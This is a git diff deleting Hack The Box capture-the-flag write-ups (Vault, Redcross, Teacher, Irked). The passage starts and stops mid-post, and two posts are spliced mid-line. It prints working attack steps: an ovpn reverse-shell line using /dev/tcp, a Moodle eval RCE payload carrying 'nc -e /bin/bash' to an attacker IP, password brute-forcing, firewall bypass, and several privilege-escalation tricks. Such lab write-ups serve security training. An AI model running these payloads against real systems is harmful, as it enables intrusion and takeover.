errors:0 dropped:0 overruns:0 carrier:0 - collisions:0 txqueuelen:1000 - RX bytes:2296 (2.2 KB) TX bytes:731 (731.0 B) -``` - -We can do a poor man's port scan using netcat and find the host `192.168.122.4` with two ports open: - -``` -dave@ubuntu:~/Desktop$ nc -nv 192.168.122.4 -z 1-1000 2>&1 | grep -v failed -Connection to 192.168.122.4 22 port [tcp/*] succeeded! -Connection to 192.168.122.4 80 port [tcp/*] succeeded! -``` - -We'll setup SSH port forwarding so we can get to the 2nd host: - -``` -root@ragingunicorn:~/hackthebox/Machines/Vault# ssh dave@10.10.10.109 -L 80:192.168.122.4:80 -``` - - - -`dns-config.php` is an invalid link (404). - -The 2nd link brings us to a VPN configuration page where we can update an ovpn file. - - - -With gobuster, we find additional information in `/notes`: - -``` -# gobuster -q -t 50 -w big.txt -u http://127.0.0.1 -s 200,204,301,302,307 -/notes (Status: 200) -``` - - - -We can grab `http://127.0.0.1/123.ovpn`: - -``` -remote 192.168.122.1 -dev tun -nobind -script-security 2 -up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/2323 0>&1'" -``` - -And `http://127.0.0.1/script.sh`: - -``` -#!/bin/bash -sudo openvpn 123.ovpn -``` - -So it seems that the `123.ovpn` file contains a reverse shell payload. - -We can just spawn a netcat on the box and trigger the `Test VPN` function to get a shell: - -``` -dave@ubuntu:~$ nc -lvnp 2323 -Listening on [0.0.0.0] (family 0, port 2323) -Connection from [192.168.122.4] port 2323 [tcp/*] accepted (family 2, sport 60596) -bash: cannot set terminal process group (1131): Inappropriate ioctl for device -bash: no job control in this shell -root@DNS:/var/www/html# id;hostname -id;hostname -uid=0(root) gid=0(root) groups=0(root) -DNS -root@DNS:/var/www/html# -``` - -User flag found in Dave's directory: - -``` -root@DNS:/home/dave# cat user.txt -cat user.txt -a4947... -``` - -There's also SSH credentials in there: - -``` -root@DNS:/home/dave# cat ssh -cat ssh -dave -dav3gerous567 -``` - -### Priv Esc - -In the web directories, there's a file that reveals two additional network segments: -- 192.168.1.0/24 -- 192.168.5.0/24 - -``` -root@DNS:/var/www/DNS# ls -la -total 20 -drwxrwxr-x 3 root root 4096 Jul 17 12:46 . -drwxr-xr-x 4 root root 4096 Jul 17 12:47 .. -drwxrwxr-x 2 root root 4096 Jul 17 10:34 desktop --rw-rw-r-- 1 root root 214 Jul 17 10:37 interfaces --rw-rw-r-- 1 root root 27 Jul 17 10:35 visudo - -root@DNS:/var/www/DNS# cat visudo -www-data ALL=NOPASSWD: ALL - -root@DNS:/var/www/DNS# cat interfaces -auto ens3 -iface ens3 inet static -address 192.168.122.4 -netmask 255.255.255.0 -up route add -net 192.168.5.0 netmask 255.255.255.0 gw 192.168.122.5 -up route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.28 -``` - -There's a route in the routing table pointing to the firewall: - -``` -dave@DNS:~$ netstat -rn -Kernel IP routing table -Destination Gateway Genmask Flags MSS Window irtt Iface -192.168.5.0 192.168.122.5 255.255.255.0 UG 0 0 0 ens3 -192.168.122.0 0.0.0.0 255.255.255.0 U 0 0 0 ens3 -``` - -In the host file we can also find a reference to our next target: 192.168.5.2 - -``` -root@DNS:/home/dave# cat /etc/hosts -cat /etc/hosts -127.0.0.1 localhost -127.0.1.1 DNS -192.168.5.2 Vault -``` - -So, we the network topology looks like this: - - - -This network is protected by a firewall, as shown earlier in the `Servers` file we found. Nmap is already installed on the DNS VM so we can use it to scan `192.168.5.2`. - -``` -root@DNS:~# nmap -P0 -p 1-10000 -T5 192.168.5.2 - -Starting Nmap 7.01 ( https://nmap.org ) at 2018-11-04 03:56 GMT -mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers -Nmap scan report for Vault (192.168.5.2) -Host is up (0.0019s latency). -Not shown: 9998 filtered ports -PORT STATE SERVICE -53/tcp closed domain -4444/tcp closed krb524 - -Nmap done: 1 IP address (1 host up) scanned in 243.36 seconds -``` - -By using the 4444 as a source port we can bypass the firewall and find another open port: - -``` -root@DNS:~# nmap -g 4444 -sS -P0 -p 1-1000 192.168.5.2 - -Starting Nmap 7.01 ( https://nmap.org ) at 2018-11-04 04:16 GMT -mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers -Nmap scan report for Vault (192.168.5.2) -Host is up (0.0023s latency). -Not shown: 999 closed ports -PORT STATE SERVICE -987/tcp open unknown - -Nmap done: 1 IP address (1 host up) scanned in 3.84 seconds -``` - -We'll need to SSH in by changing the source port of the TCP socket. To do that we can spawn a ncat listener that redirects to port 987 while changing the source port. Then we just SSH to ourselves on the ncat listening port. - -``` -root@DNS:~# ncat -l 2222 --sh-exec "ncat 192.168.5.2 987 -p 4444" -``` - -``` -root@DNS:~# ssh -p 2222 dave@127.0.0.1 (password = dav3gerous567) - -Last login: Mon Sep 3 16:48:00 2018 -dave@vault:~$ id -uid=1001(dave) gid=1001(dave) groups=1001(dave) - -vault:~$ ls -root.txt.gpg -``` - -The only thing interesting is the `root.txt.gpg` - -We can download this back to the host OS and decrypt it with the `itscominghome` key we found earlier: - -``` -root@DNS:/var/www/html# ncat -l 2222 --sh-exec "ncat 192.168.5.2 987 -p 4444" - -dave@ubuntu:~$ scp -P 2222 dave@192.168.122.4:~/root.txt.gpg . -dave@192.168.122.4's password: -root.txt.gpg 100% 629 0.6KB/s 00:00 -``` - -``` -dave@ubuntu:~$ gpg -d root.txt.gpg - -You need a passphrase to unlock the secret key for -user: "david
"; - echo "$username : $passw
Continue"; -} -``` - -Let's try the same SQL query again with these credentials: - -``` -unix=> insert into passwd_table (username, passwd, uid, gid, homedir) values ('snowscan','$6$oTkOZvSm$T5279pL/85f822ryylJBp0kHgGRoELCHb4OOBtwmkWWxZ6re/Vlxx6UAzEdZxhzd/MbSyjR5Kp1x4rtNCgHsJ1',0,0,'/root'); -ERROR: permission denied for relation passwd_table -``` - -Ugh. Same problem again, let's try adding a user without setting the UID, but only the GID: - -``` -unix=> insert into passwd_table (username, passwd, gid, homedir) values ('snowscan','$6$oTkOZvSm$T5279pL/85f822ryylJBp0kHgGRoELCHb4OOBtwmkWWxZ6re/Vlxx6UAzEdZxhzd/MbSyjR5Kp1x4rtNCgHsJ1',0,'/root'); -ERROR: duplicate key value violates unique constraint "passwd_table_username_key" -DETAIL: Key (username)=(snowscan) already exists. -unix=> insert into passwd_table (username, passwd, gid, homedir) values ('snowscan2','$6$oTkOZvSm$T5279pL/85f822ryylJBp0kHgGRoELCHb4OOBtwmkWWxZ6re/Vlxx6UAzEdZxhzd/MbSyjR5Kp1x4rtNCgHsJ1',0,'/root'); -INSERT 0 1 -unix=> select * from passwd_table; - username | passwd | uid | gid | gecos | homedir | shell ------------+----------------------------------------------------------------------------------------------------+------+------+-------+----------------+----------- - tricia | $1$WFsH/kvS$5gAjMYSvbpZFNu//uMPmp. | 2018 | 1001 | | /var/jail/home | /bin/bash - snowscan | $1$ANxI97CM$noo3OJtS7FevXzzfR//ih0 | 2020 | 1001 | | /var/jail/home | /bin/bash - snowscan2 | $6$oTkOZvSm$T5279pL/85f822ryylJBp0kHgGRoELCHb4OOBtwmkWWxZ6re/Vlxx6UAzEdZxhzd/MbSyjR5Kp1x4rtNCgHsJ1 | 2022 | 0 | | /root | /bin/bash -(3 rows) -``` - -Allright, we can log in now, but still don't have access to read root.txt, we'll need to have a UID of 0 to do that: - -``` -snowscan2@redcross:~$ ls -l -total 12 -drwxr-xr-x 3 root root 4096 Jun 6 14:05 bin -drwxrwxr-x 11 root root 4096 Jun 7 17:32 Haraka-2.8.8 --rw------- 1 root root 33 Jun 8 06:51 root.txt -snowscan2@redcross:~$ cat root.txt -cat: root.txt: Permission denied -``` - -We can now read `nss-pgsql-root.conf` since we are part of root's group and we find more credentials: `unixnssroot / 30jdsklj4d_3` - -``` -snowscan2@redcross:/etc$ ls -l nss-pgsql-root.conf --rw-rw---- 1 root root 540 Jun 8 06:24 nss-pgsql-root.conf -snowscan2@redcross:/etc$ cat nss-pgsql-root.conf -shadowconnectionstring = hostaddr=127.0.0.1 dbname=unix user=unixnssroot password=30jdsklj4d_3 connect_timeout=1 -shadowbyname = SELECT username, passwd, date_part('day',lastchange - '01/01/1970'), min, max, warn, inact, expire, flag FROM shadow_table WHERE username = $1 ORDER BY lastchange DESC LIMIT 1; -shadow = SELECT username, passwd, date_part('day',lastchange - '01/01/1970'), min, max, warn, inact, expire, flag FROM shadow_table WHERE (username,lastchange) IN (SELECT username, MAX(lastchange) FROM shadow_table GROUP BY username); -``` - -Using this account, we are able to create a new user with UID 0: - -``` -unix=> insert into passwd_table (username, passwd, uid,gid, homedir) values ('snowscan_root','$6$oTkOZvS...',0,0,'/root'); -INSERT 0 1 -unix=> select * from passwd_table; - username | passwd | uid | gid | gecos | homedir | shell ----------------+----------------------------------------------------------------------------------------------------+------+------+-------+----------------+----------- - tricia | $1$WFsH/kvS$5gAjMYSvbpZFNu//uMPmp. | 2018 | 1001 | | /var/jail/home | /bin/bash - snowscan | $1$ANxI97CM$NZZ3OJtS7FevXzzfR//ih0 | 2020 | 1001 | | /var/jail/home | /bin/bash - snowscan2 | $6$oTkOZvSm$T5279pL/85f822ryylJBp0kHgGRoELCHb4OOBtwmkWWxZ6re/Vlxx6UCzEdZxhzd/MbSy2R5Kp1x4rtNCgHsJ1 | 2022 | 0 | | /root | /bin/bash - snowscan_root | $6$oTkOZvSm$T5279pL/85f822ryylJBp0kHgGRoELCHb4OOBtwmkWWxZ6re/Vlxx6UCzEdZxhzd/MbSy2R5Kp1x4rtNCgHsJ1 | 0 | 0 | | /root | /bin/bash -(4 rows) -``` - -We can't SSH in with this account because of the SSH server settings: - -```console -snowscan2@redcross:/etc/ssh$ grep -i root sshd_config -PermitRootLogin prohibit-password -``` - -But we can `su` to the new user and get the root flag - -```console -snowscan2@redcross:/etc/ssh$ su -l snowscan_root -Password: - -snowscan_root@redcross:~# id -uid=0(snowscan_root) gid=0(root) groups=0(root) - -snowscan_root@redcross:~# cat /root/root.txt -892a1f... -``` \ No newline at end of file diff --git a/_posts/2019-04-20-htb-writeup-teacher.md b/_posts/2019-04-20-htb-writeup-teacher.md deleted file mode 100644 index 6d41bae136..0000000000 --- a/_posts/2019-04-20-htb-writeup-teacher.md +++ /dev/null @@ -1,301 +0,0 @@ ---- -layout: single -title: Teacher - Hack The Box -excerpt: "Teacher uses the Moodle Open Source Learning platform and contains a vulnerability in the math formula that gives us RCE. The credentials for the Moodle application are found in a .png file that contains text instead of an actual image. After getting a shell with the math formula, we find the low privilege user credentials in the MySQL database. We then escalate to root by abusing a backup script running from a cronjob as root." -date: 2019-04-20 -classes: wide -header: - teaser: /assets/images/htb-writeup-teacher/teacher_logo.png -categories: - - hackthebox - - infosec -tags: - - moodle - - mysql - - enumeration - - ctf - - tar - - cronjob ---- - - - -Teacher uses the Moodle Open Source Learning platform and contains a vulnerability in the math formula that gives us RCE. The credentials for the Moodle application are found in a .png file that contains text instead of an actual image. After getting a shell with the math formula, we find the low privilege user credentials in the MySQL database. We then escalate to root by abusing a backup script running from a cronjob as root. - -## Tools/Exploits/CVEs used - -- [https://blog.ripstech.com/2018/moodle-remote-code-execution/](https://blog.ripstech.com/2018/moodle-remote-code-execution/) -- [https://github.com/StefanoDeVuono/steghide](stehide) - -### Nmap - -Only the HTTP port is open on this box, running the Apache webserver. - -``` -# nmap -F -sC -sV 10.10.10.153 -Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-01 21:20 EST -Nmap scan report for teacher.htb (10.10.10.153) -Host is up (0.018s latency). -Not shown: 99 closed ports -PORT STATE SERVICE VERSION -80/tcp open http Apache httpd 2.4.25 ((Debian)) -|_http-server-header: Apache/2.4.25 (Debian) -|_http-title: Blackhat highschool -``` - -### Enumerating the website - - - -The first pass at dirbursting shows the `/moodle` directory, which refers to the [Moodle](https://moodle.org/) Open Source Learning platform. -``` -# gobuster -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 50 -u http://teacher.htb -/.htaccess (Status: 403) -/.htpasswd (Status: 403) -/css (Status: 301) -/fonts (Status: 301) -/images (Status: 301) -/javascript (Status: 301) -/js (Status: 301) -/manual (Status: 301) -/moodle (Status: 301) -/phpmyadmin (Status: 403) -/server-status (Status: 403) -===================================================== -2018/12/01 14:02:42 Finished -===================================================== -``` - -I also spidered the host with Burp hoping to catch other stuff. I noticed that the image file `5.png` wasn't showing up with the same icon as the rest of the other files: - - - -When we browse to the gallery, we also see there's an image missing: - - - -The source code contains the file as well as a weird javascript console message: - - - -The `5.png` image file exists but isn't a valid image: - - - -If we look at the file with Burp, we see that the file contains part of a password: `Th4C00lTheacha`. We can guess that the user is probably named Giovanni based on the note. - - - -### Moodle enumeration - -The Moodle application is running on this server, as shown below: - - - -Guest login is enabled but we don't have access to anything useful with this account. - -We got a partial password from the `5.png` file but we're missing the last letter. I used the following script to generate a wordlist: - -```python -f = open('pwd', 'w') -for i in range (0,127): - f.write('Th4C00lTheacha{}\n'.format(chr(i))) -``` - -Then using hydra we can bruteforce the `giovanni` account. We'll match on `Set-Cookie` as a positive response since the cookie is only set when we submit the correct credentials. - -``` -# hydra -I -l giovanni -P pwd.txt 10.10.10.153 http-post-form "/moodle/login/index.php:username=^USER^&password=^PASS^:S=Set-Cookie" -Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. - -Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-01 21:37:44 -[DATA] max 16 tasks per 1 server, overall 16 tasks, 128 login tries (l:1/p:128), ~8 tries per task -[DATA] attacking http-post-form://10.10.10.153:80//moodle/login/index.php:username=^USER^&password=^PASS^:S=Set-Cookie -[80][http-post-form] host: 10.10.10.153 login: giovanni password: Th4C00lTheacha# -1 of 1 target successfully completed, 1 valid password found -Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-01 21:38:06 -``` - -We found the password: `Th4C00lTheacha#` - -We can now log in to the Moodle webpage with `giovanni / Th4C00lTheacha#`: - - - -I googled vulnerabilities for Moodle and found a [blog post](https://blog.ripstech.com/2018/moodle-remote-code-execution/) about an RCE vulnerability in the Math formulas of the Quiz component. Basically, the math formula uses the PHP `eval` function to return the result and the input sanitization that is put in place in Moodle is not sufficient and can bypassed. Once we have RCE we can spawn a reverse shell. - -First we add a new quiz: - - -Then create a question with 'Calculated' type: - - -We can put anything in the question name and text but for the formula we enter ``/*{a*/`$_GET[0]`;//{x}}`` - - -The formula will execute code we put in the `$_GET['0']` parameter: - -`10.10.10.153/moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D7%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=6&wizardnow=datasetitems&cmid=7&0=(nc -e /bin/bash 10.10.14.23 4444)` - - - -This'll spawn a shell for us: - -``` -# nc -lvnp 4444 -listening on [any] 4444 ... -connect to [10.10.14.23] from (UNKNOWN) [10.10.10.153] 49210 -id -uid=33(www-data) gid=33(www-data) groups=33(www-data) -python -c 'import pty;pty.spawn("/bin/bash")' -www-data@teacher:/var/www/html/moodle/question$ -``` - -### Getting access to giovanni user - -Like any web application with a database backend, the first thing I do once I get a shell is look for hardcoded database credentials in the PHP configuration file of the application. The Moodle configuration file contains the `root` account password for the MySQL database: - -``` -www-data@teacher:/var/www/html/moodle$ cat config.php -dbtype = 'mariadb'; -$CFG->dblibrary = 'native'; -$CFG->dbhost = 'localhost'; -$CFG->dbname = 'moodle'; -$CFG->dbuser = 'root'; -$CFG->dbpass = 'Welkom1!'; -``` - -List of databases: -``` -MariaDB [(none)]> show databases; -show databases; -+--------------------+ -| Database | -+--------------------+ -| information_schema | -| moodle | -| mysql | -| performance_schema | -| phpmyadmin | -+--------------------+ -``` - -The `mdl_user` table contains passwords: -``` -MariaDB [moodle]> show tables; -show tables; -+----------------------------------+ -| Tables_in_moodle | -+----------------------------------+ -... -| mdl_user | -... -``` - -``` -MariaDB [moodle]> select * from mdl_user; -select * from mdl_user; -+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+ -| id | auth | confirmed | policyagreed | deleted | suspended | mnethostid | username | password | idnumber | firstname | lastname | email | emailstop | icq | skype | yahoo | aim | msn | phone1 | phone2 | institution | department | address | city | country | lang | calendartype | theme | timezone | firstaccess | lastaccess | lastlogin | currentlogin | lastip | secret | picture | url | description | descriptionformat | mailformat | maildigest | maildisplay | autosubscribe | trackforums | timecreated | timemodified | trustbitmask | imagealt | lastnamephonetic | firstnamephonetic | middlename | alternatename | -+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+ -| 1 | manual | 1 | 0 | 0 | 0 | 1 | guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO | | Guest user | | root@localhost | 0 | | | | | | | | | | | | | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | This user is a special user that allows read-only access to some courses. | 1 | 1 | 0 | 2 | 1 | 0 | 0 | 1530058999 | 0 | NULL | NULL | NULL | NULL | NULL | -| 2 | manual | 1 | 0 | 0 | 0 | 1 | admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 | | Admin | User | gio@gio.nl | 0 | | | | | | | | | | | | | en | gregorian | | 99 | 1530059097 | 1530059573 | 1530059097 | 1530059307 | 192.168.206.1 | | 0 | | | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 1530059135 | 0 | NULL | | | | | -| 3 | manual | 1 | 0 | 0 | 0 | 1 | giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO | | Giovanni | Chhatta | Giio@gio.nl | 0 | | | | | | | | | | | | | en | gregorian | | 99 | 1530059681 | 1543718703 | 1543718276 | 1543718446 | 10.10.14.23 | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1530059291 | 1530059291 | 0 | | | | | | -| 1337 | manual | 0 | 0 | 0 | 0 | 0 | Giovannibak | 7a860966115182402ed06375cf0a22af | | | | | 0 | | | | | | | | | | | | | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | NULL | 1 | 1 | 0 | 2 | 1 | 0 | 0 | 0 | 0 | NULL | NULL | NULL | NULL | NULL | -+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+ -4 rows in set (0.00 sec) -``` - -The `Giovannibak` account hash the `7a860966115182402ed06375cf0a22af` MD5 hash, which is `expelled` if we look it up on [https://hashkiller.co.uk/md5-decrypter.aspx](https://hashkiller.co.uk/md5-decrypter.aspx). - -``` -www-data@teacher:/$ su -l giovanni -Password: expelled - -giovanni@teacher:~$ cat user.txt -cat user.txt -fa9ae... -``` - -### Priv esc - -The `/home/giovanni/work` directory contains a bunch of files, but the `backup_courses.tar.gz` timestamp keep changing every minute so we can assume the file is being created by a cron job running as root: - -``` -giovanni@teacher:~/work$ ls -lR -ls -lR -.: -total 8 -drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 04:58 courses -drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 04:34 tmp - -./courses: -total 4 -drwxr-xr-x 2 root root 4096 Jun 27 04:15 algebra - -./courses/algebra: -total 4 --rw-r--r-- 1 giovanni giovanni 109 Jun 27 04:12 answersAlgebra - -./tmp: -total 8 --rwxrwxrwx 1 root root 256 Dec 2 03:52 backup_courses.tar.gz -drwxrwxrwx 3 root root 4096 Jun 27 04:58 courses - -./tmp/courses: -total 4 -drwxrwxrwx 2 root root 4096 Jun 27 04:15 algebra - -./tmp/courses/algebra: -total 4 --rwxrwxrwx 1 giovanni giovanni 109 Jun 27 04:12 answersAlgebra - -giovanni@teacher:~/work$ date -Sun Dec 2 03:52:38 CET 2018 -``` - -The backup script that runs as root is located in `/usr/bin/backup.sh`: -``` -#!/bin/bash -cd /home/giovanni/work; -tar -czvf tmp/backup_courses.tar.gz courses/*; -cd tmp; -tar -xf backup_courses.tar.gz; -chmod 777 * -R; -``` - -We can get the root flag by replacing the `courses` directory with a symlink to `/root`, waiting for the next archive to be created then untar it to retrieve the root flag: -``` -giovanni@teacher:~/work$ mv courses test -giovanni@teacher:~/work$ ln -s /root courses -[ ... wait a minute ...] -giovanni@teacher:~/work/tmp/courses$ cat root.txt -cat root.txt -4f3a8... -``` - -The cronjob changes the permissions to 777 when it extracts the backup archive. If we swap the `courses` directory in the `~/work/tmp` folder with a symlink to `/etc` it'll change the permissions of `/etc` and everything in it to 777: -``` -giovanni@teacher:~/work/tmp$ rm -rf courses -giovanni@teacher:~/work/tmp$ ln -s /etc courses - -giovanni@teacher:~/work/tmp$ ls -l / | grep etc -ls -l / | grep etc -drwxrwxrwx 85 root root 4096 Apr 18 21:55 etc -``` - -Now that we have complete read-write access to anything in `/etc` we can change the password of the root user to anything we want: -``` -giovanni@teacher:/etc$ mkpasswd -m sha-512 yolo1234 -$6$jfdDr.oQ3xp6H/Em$iIPF1i31pZ/SeZe31/LDhruZFflDbmiFdsln.BA2w./lOtMUHMZYLOwsPAJaufSB4/Sn/gNIwZMWquEGR.sh1/ -``` - -After editing the `/etc/shadow` file we can log in as root: -``` -giovanni@teacher:/etc$ su -l root -Password: -root@teacher:~# id -uid=0(root) gid=0(root) groups=0(root) -``` diff --git a/_posts/2019-04-27-htb-writeup-irked.md b/_posts/2019-04-27-htb-writeup-irked.md deleted file mode 100644 index 546f51eea1..0000000000 --- a/_posts/2019-04-27-htb-writeup-irked.md +++ /dev/null @@ -1,222 +0,0 @@ ---- -layout: single -title: Irked - Hack The Box -excerpt: "Irked is an easy box running a backdoored UnrealIRC installation. I used a Metasploit module to get a shell then ran `steghide` to obtain the SSH credentials for the low privileged user then got root by exploiting a vulnerable SUID binary." -date: 2019-04-27 -classes: wide -header: - teaser: /assets/images/htb-writeup-irked/irked_logo.png -categories: - - hackthebox - - infosec -tags: - - ctf - - stego - - cve - - metasploit - - suid ---- - - - -Irked is an easy box running a backdoored UnrealIRC installation. I used a Metasploit module to get a shell then ran `steghide` to obtain the SSH credentials for the low privileged user then got root by exploiting a vulnerable SUID binary. - -## Tools/Exploits/CVEs used - -- steghide -- metasploit - -## Summary - -- UnrealIRCd MSF exploit for initial foothold -- steghide encoded file containing password for user -- SUID binary for priv esc - -### Nmap - -Aside from the typical Apache and OpenSSH services, I noticed that UnrealIRCd is installed. - -``` -# nmap -p- -sC -sV 10.10.10.117 -Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-17 14:02 EST -Nmap scan report for 10.10.10.117 -Host is up (0.019s latency). -Not shown: 65528 closed ports -PORT STATE SERVICE VERSION -22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) -| ssh-hostkey: -| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA) -| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA) -| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA) -|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519) -80/tcp open http Apache httpd 2.4.10 ((Debian)) -|_http-server-header: Apache/2.4.10 (Debian) -|_http-title: Site doesn't have a title (text/html). -111/tcp open rpcbind 2-4 (RPC #100000) -| rpcinfo: -| program version port/proto service -| 100000 2,3,4 111/tcp rpcbind -| 100000 2,3,4 111/udp rpcbind -| 100024 1 33436/udp status -|_ 100024 1 50397/tcp status -6697/tcp open irc UnrealIRCd -8067/tcp open irc UnrealIRCd -50397/tcp open status 1 (RPC #100024) -65534/tcp open irc UnrealIRCd -Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel -``` - -### Webpage - -The main page just has a picture and a note about IRC. - - - -### UnrealIRCd exploitation - -The box is running UnrealIRCd and searchsploit shows there's an MSF exploit for it: -``` -root@ragingunicorn:~/Downloads# searchsploit unrealirc -UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) -``` - -Getting a shell with Metasploit is easy: -``` -msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options - -Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - RHOSTS 10.10.10.117 yes The target address range or CIDR identifier - RPORT 8067 yes The target port (TCP) - - -Payload options (cmd/unix/reverse): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - LHOST 10.10.14.23 yes The listen address (an interface may be specified) - LPORT 4444 yes The listen port - - -Exploit target: - - Id Name - -- ---- - 0 Automatic Target - -msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run - -[*] Started reverse TCP double handler on 10.10.14.23:4444 -[*] 10.10.10.117:8067 - Connected to 10.10.10.117:8067... - :irked.htb NOTICE AUTH :*** Looking up your hostname... -[*] 10.10.10.117:8067 - Sending backdoor command... -[*] Accepted the first client connection... -[*] Accepted the second client connection... -[*] Command: echo O1zcz5ML2uK8OjPk; -[*] Writing to socket A -[*] Writing to socket B -[*] Reading from sockets... -[*] Reading from socket A -[*] A: "O1zcz5ML2uK8OjPk\r\n" -[*] Matching... -[*] B is input... -[*] Command shell session 1 opened (10.10.14.23:4444 -> 10.10.10.117:58328) at 2018-11-17 14:08:40 -0500 -``` - -I have a shell as user `ircd`: -``` -python -c 'import pty;pty.spawn("/bin/bash")' -ircd@irked:~/Unreal3.2$ id -id -uid=1001(ircd) gid=1001(ircd) groups=1001(ircd) -``` - -The `djmardov` user home directroy has a `.backup` file that contains the password for some stego encoded file: -``` -djmardov@irked:~/Documents$ ls -la -ls -la -total 16 -drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 . -drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 04:40 .. --rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup --rw------- 1 djmardov djmardov 33 May 15 2018 user.txt -djmardov@irked:~/Documents$ cat .backup -cat .backup -Super elite steg backup pw -UPupDOWNdownLRlrBAbaSSss -``` - -Password: `UPupDOWNdownLRlrBAbaSSss` - -Since the note mentionned stego and this box is rated as easy, I guessed that it would be an off-the-shelf tool like `steghide` and not some custom obfuscation. The hidden file is found in the `irked.jpg` image from the main page and the steg doesn't use any passphrase. -``` -root@ragingunicorn:~/Downloads# steghide extract -sf irked.jpg -Enter passphrase: -wrote extracted data to "pass.txt". -root@ragingunicorn:~/Downloads# -root@ragingunicorn:~/Downloads# cat pass.txt -Kab6h+m+bbp2J:HG -``` - -djmardov's password is: `Kab6h+m+bbp2J:HG` - -I can SSH in and get the user flag: - -```console -djmardov@irked:~/Documents$ cat user.txt -cat user.txt -4a66a7... -``` - -### Priv esc - -I found a suspicious SUID file: `/usr/bin/viewuser` - -```console -djmardov@irked:~$ find / -perm /4000 2>/dev/null -find / -perm /4000 2>/dev/null -/usr/lib/dbus-1.0/dbus-daemon-launch-helper -/usr/lib/eject/dmcrypt-get-device -/usr/lib/policykit-1/polkit-agent-helper-1 -/usr/lib/openssh/ssh-keysign -/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper -/usr/sbin/exim4 -/usr/sbin/pppd -/usr/bin/chsh -/usr/bin/procmail -/usr/bin/gpasswd -/usr/bin/newgrp -/usr/bin/at -/usr/bin/pkexec -/usr/bin/X -/usr/bin/passwd -/usr/bin/chfn -/usr/bin/viewuser -``` - -When I execute the file, I see it runs `/tmp/listusers` - -``` -djmardov@irked:~$ /usr/bin/viewuser -This application is being devleoped to set and test user permissions -It is still being actively developed -(unknown) :0 2018-11-17 13:54 (:0) -djmardov pts/1 2018-11-17 14:19 (10.10.14.23) -sh: 1: /tmp/listusers: not found -``` - -Since it's a running as root and I have write access to `tmp` I can just copy `/bin/sh` to `/tmp/listusers` and gain root - -```console -djmardov@irked:~$ cp /bin/sh /tmp/listusers -djmardov@irked:~$ /usr/bin/viewuser -This application is being devleoped to set and test user permissions -It is still being actively developed -(unknown) :0 2018-11-17 13:54 (:0) -djmardov pts/1 2018-11-17 14:19 (10.10.14.23) -# cd /root -# cat root.txt -8d8e9e... -``` \ No newline at end of file diff --git a/_posts/2019-05-04-htb-writeup-bighead.md b/_posts/2019-05-04-htb-writeup-bighead.md deleted file mode 100644 index 714a4bd4f0..0000000000 --- a/_posts/2019-05-04-htb-writeup-bighead.md +++ /dev/null @@ -1,1248 +0,0 @@ ---- -layout: single -title: Bighead - Hack The Box -excerpt: "Bighead was an extremely difficult box by 3mrgnc3 that starts with website enumeration to find two sub-domains and determine there is a custom webserver software running behind an Nginx proxy. We then need to exploit a buffer overflow in the HEAD requests by creating a custom exploit. After getting a shell, there's some pivoting involved to access a limited SSH server, then an 